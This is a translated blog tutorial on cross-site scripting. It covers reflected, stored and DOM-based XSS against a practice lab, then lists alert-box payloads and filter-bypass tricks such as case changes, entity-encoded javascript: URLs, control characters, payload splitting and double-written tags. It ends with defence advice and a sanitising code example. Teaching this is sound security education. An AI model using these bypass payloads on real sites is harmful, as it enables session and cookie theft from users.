XSS (cross-site scripting attack) principle and use

Table of Contents

1. XSS principle

2. XSS hazards

3. XSS test environment download

4. XSS classification
   1. Reflected XSS
   2. Stored XSS
   3. DOM-based XSS

5. Constructing XSS payloads
   1. Use <> to construct HTML/JS
   2. Pseudo-protocol
   3. Use HTML events
   4. Other tags and techniques

6. XSS variants (common interview question)
   1. Case conversion
   2. Use of quotation marks
   3. Slash instead of space
   4. Tab and carriage return
   5. Encode tag attribute values
   6. Splitting the payload
   7. Double writing to bypass a single-pass filter

7. XSS defense

8. XSS challenge


1. XSS principle

XSS stands for Cross-Site Scripting. It would naturally be abbreviated CSS, but because that clashes with CSS (Cascading Style Sheets) it is abbreviated XSS instead. XSS attacks are carried out mainly with JS, which can manipulate HTML, CSS and the browser very flexibly.

XSS injects constructed code (JS) into a web page; the browser interprets and runs that JS, producing the effect of a malicious attack. When a user visits a page into which an XSS script has been injected, the script is loaded and the user's browser parses it, which means the user has been attacked. The user need only browse the web: the browser contains a JavaScript interpreter that parses JavaScript but does not judge whether the code is malicious. In other words, the targets of XSS are users and their browsers.

2. XSS hazards

  • Steal various user accounts
  • Steal the user's cookies and impersonate the user on the website
  • Hijack user sessions and perform arbitrary operations
  • Inflate traffic and show pop-up ads
  • Spread worms

3. XSS test environment download

We will study XSS through a practice environment, xss_test (the download address); after downloading it, place it in the web server's root directory and it can be accessed.

4. XSS classification

1. Reflected XSS

Reflected XSS is non-persistent, parameter-based cross-site scripting: the JS code is carried in a parameter (variable) of the web application, for example the search box. Whenever the content we enter is echoed to the page unchanged, we can suspect reflected XSS.
For example, we typed the number 2323 into the search box and submitted the form, intercepted the request, and saw that 2323 was sent to xss.php and echoed to the page as-is. Next we look at the source code of xss.php.

In the source code of xss.php (written in PHP) we find that the submitted value is written into the page unchanged, that is, the input is output without any filtering. So we can submit JS code instead.

Submit a string of pop-up JS code, for example <script>alert(/xss/)</script>. The browser executes the pop-up as soon as it encounters the JS code, which is how reflected XSS occurs.

That is reflected XSS!!

2. Stored XSS

Stored XSS is persistent cross-site scripting. Persistence means the XSS code is not in a parameter (variable) but is written into a medium that stores data permanently, such as a database or a file. Stored XSS usually occurs in places like message boards: you leave a message, and the malicious code is written into the database.

If the message board has stored XSS, we inject the JS code. At this point we have only completed the first step, writing the malicious code into the database. Because XSS relies on JS, and JS runs in the browser, the browser must load the malicious code from the server before the XSS actually triggers (the code runs). So next we act as the website's backend administrator and view the messages.

3. DOM-based XSS

DOM is the Document Object Model. The attack payload modifies the DOM tree of the victim's browser page. What is special is that the payload executes by modifying the DOM tree locally in the browser and is not sent to the server, which makes DOM XSS harder to detect.

Open the DOM XSS page.

The script takes the characters after "message=" in the URL and writes them to the page.

Submit ?message=2021, and the browser displays the data we submitted.

Checking the page source now, it has not changed; inspecting the element, however, shows the data we submitted, confirming what was said above: DOM XSS modifies the DOM tree of the victim's browser page.

JS code can be submitted the same way.

5. Constructing XSS payloads

1. Use <> to construct HTML/JS

Construct a script tag:

<script>alert(/xss/)</script>

2. Pseudo-protocol

javascript:JS code       #construct XSS via the javascript: pseudo-protocol

You can put the pseudo-protocol in an HTML hyperlink:

<a href="javascript:alert(/xss/)">touch me!</a>   #Clicking the hyperlink triggers the XSS.

3. Use HTML events

"Event-driven" is a classic programming idea. Many events (mouse movement, keyboard input, etc.) occur on a web page, and JS can respond to them, so we can trigger JS functions, and therefore XSS, through events.

Click event
<input type="button" onclick="alert(/xss/)" value="点我! ">
Double-click event
<input type="button" ondblclick="alert(/xss/)" value="双击666">
Hover
<img src='./smile.jpg' onmouseover='alert(/xss/)'>
Pop-up when the image fails to load
<img src='#' onerror="alert(/xss/)">
Triggered by a key press
<input type="text" onkeydown="alert(/xss/)">

4. Other tags and techniques

We can also use other tags to trigger XSS.

Pops up as soon as you submit
<svg onload="alert(/xss/)">   #svg is a new tag in HTML5; onload is also an event
Focus / autofocus
<input onfocus=alert(/xss/) autofocus>  #the element is focused automatically, and the pop-up fires

6. XSS variants (common interview question)

Some web pages filter XSS, but we can bypass the filter by changing the form of the payload.

1. Case conversion

Change the case of letters in the payload, as in the following two examples.

<Img sRc='#' Onerror="alert(/xss/)"/>
#alert is JS code, so only img and src can have their case changed
<A hREf="javaScript:alert(/xss/)">click me</A>

We can submit these two statements for testing

2. Use of quotation marks

HTML is not strict about quoting: attribute values may use double quotes, single quotes, or no quotes at all.

<img src="#" onerror="alert(/xss/)"/>
<img src='#' onerror='alert(/xss/)'/>
<img src=# onerror=alert(/xss/) />

3. Slash instead of space

You can use a forward slash instead of spaces:

<Img/sRc='#'/Onerror='alert(/xss/)' />  #alert(/xss/) uses slashes so as to avoid single quotes where possible
<Img/sRc='#'/Onerror=alert('xss') />
<Img/sRc='#'/Onerror='alert(/AJEST/)' />

4. Tab and carriage return

You can insert Tab (horizontal tab) characters and carriage returns in some places to bypass keyword detection.

<A hREf="j
avas
c
r
i
p
t:alert(/xss/)">click me!</a>

 

5. Encode tag attribute values

Encode the tag attribute value to bypass filtering. The corresponding encodings are as follows (the trailing semicolon marks the end of an entity):

Letter   ASCII decimal   Decimal entity   Hex entity
a        97              &#97;            &#x61;
e        101             &#101;           &#x65;

 

 

For example, encode the attribute value of <A hREf="javaScript:alert(/xss/)">click me</A>: the first a is encoded in decimal as &#97; and the second in hexadecimal as &#x61;, as follows

<A hREf="j&#97;v&#x61;Script:alert(/xss/)">click me</A>

Clicking it gives the same pop-up.

In addition, control characters such as carriage return, line feed and horizontal tab can be inserted into the code.

For the meaning of the ASCII control characters, see https://blog.csdn.net/sxdtzhp/article/details/50993571

 

Tab                &#9;
Line feed          &#10;
Carriage return    &#13;
SOH                &#1;    (ASCII control character Start Of Heading: marks the beginning of a header; optional and has no effect, just the start of the data stream)
STX                &#2;    #Start of text

 

 

 

After encoding, it looks like this:

<A hREf="&#01;j&#10;&#97;v&#x61;s&#9;c&#10;r&#13;ipt:alert(/xss/)">click me!</a>

 

 

6. Splitting the payload

The core idea is to split a relatively long JS statement into shorter pieces and submit them separately. For example, split <script>alert(/xss/)</script> as follows:

<script>z='alert'</script>        #first submission
<script>z=z+'(/xss/)'</script>    #second submission
<script>eval(z)</script>          #third submission

Leave three messages in this way. When the three messages are loaded on the same page, the XSS attack triggers.

7. Double writing to bypass a single-pass filter

If a character sequence is filtered only once, double writing bypasses it: if the program strips the keyword <script>, we can submit <sc<script>ript>, and after the single removal the <script> tag is left behind.

7. XSS defense

1) Front-end and server-side: limit the length of input strings.
2) Front-end and server-side: HTML-escape output. Escape special characters such as "<" and ">" by replacing them with the corresponding HTML entities. The core of XSS prevention is filtering the input data.

3) Blacklist/whitelist strategy: whether input filtering or output encoding is used, it is a blacklist or whitelist filter applied to the data.
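The defense advice above in working code, as an added example that is not from the original post: the single-pass keyword filter of section 6 is run against the bypass variants listed earlier, beside output encoding and a URL scheme allowlist for href values (the entity-encoded pseudo-protocol payload of section 5 needs the latter, since escaping alone does not stop a javascript: URL). All function names, the message-board renderer and the sample inputs are my own construction.

```javascript
// Naive blacklist of the kind section 6 describes: removes "<script>" once.
function stripScriptOnce(input) {
  return input.replace(/<script>/i, "");
}

// Escape the five HTML-significant characters before placing untrusted text
// into an element body or a double-quoted attribute value.
function escapeHtml(input) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(input).replace(/[&<>"']/g, (c) => map[c]);
}

// Normalise an href/src value the way a browser does before reading the
// scheme: decode decimal and hex numeric entities (section 5), then drop the
// ASCII control characters (SOH, TAB, LF, CR ...) and lower-case the result.
function normalizeUrl(value) {
  return String(value)
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => String.fromCodePoint(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => String.fromCodePoint(parseInt(d, 10)))
    .replace(/[\x00-\x20]/g, "")
    .toLowerCase();
}

// Allowlist: only absolute http(s) URLs are accepted as link targets, so a
// javascript: pseudo-protocol value is rejected however it is obfuscated.
function isSafeUrl(value) {
  return /^https?:\/\//.test(normalizeUrl(value));
}

// Hypothetical message-board renderer: message text plus an optional homepage
// link, both untrusted. The returned HTML is safe to insert into the page.
function renderMessage(text, homepage) {
  const href = isSafeUrl(homepage) ? escapeHtml(homepage) : "#";
  return `<p><a href="${href}">${escapeHtml(text)}</a></p>`;
}

// True when a string still contains a raw tag start after processing.
function containsTag(s) {
  return /<[a-z]/i.test(s);
}

// Constructed inputs: the payload variants listed in the sections above.
const PAYLOADS = [
  "<sc<script>ript>alert(/xss/)</script>",
  "<Img sRc='#' Onerror=\"alert(/xss/)\"/>",
  "<svg onload=\"alert(/xss/)\">",
  "<input onfocus=alert(/xss/) autofocus>",
];
const OBFUSCATED_HREF = "&#01;j&#10;&#97;v&#x61;s&#9;c&#10;r&#13;ipt:alert(/xss/)";
```

Encoding has to match the output context: escapeHtml covers element bodies and quoted attribute values, while a URL attribute additionally needs the scheme check, because an escaped javascript: URL is still a javascript: URL once the browser decodes it.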

8. XSS challenge

For hands-on practice, go to the portal: the XSS challenge of xss-challenge.

 

 

——Heart, if there is no place to live, it will be wandering everywhere

 


Origin blog.csdn.net/qq_44159028/article/details/114652489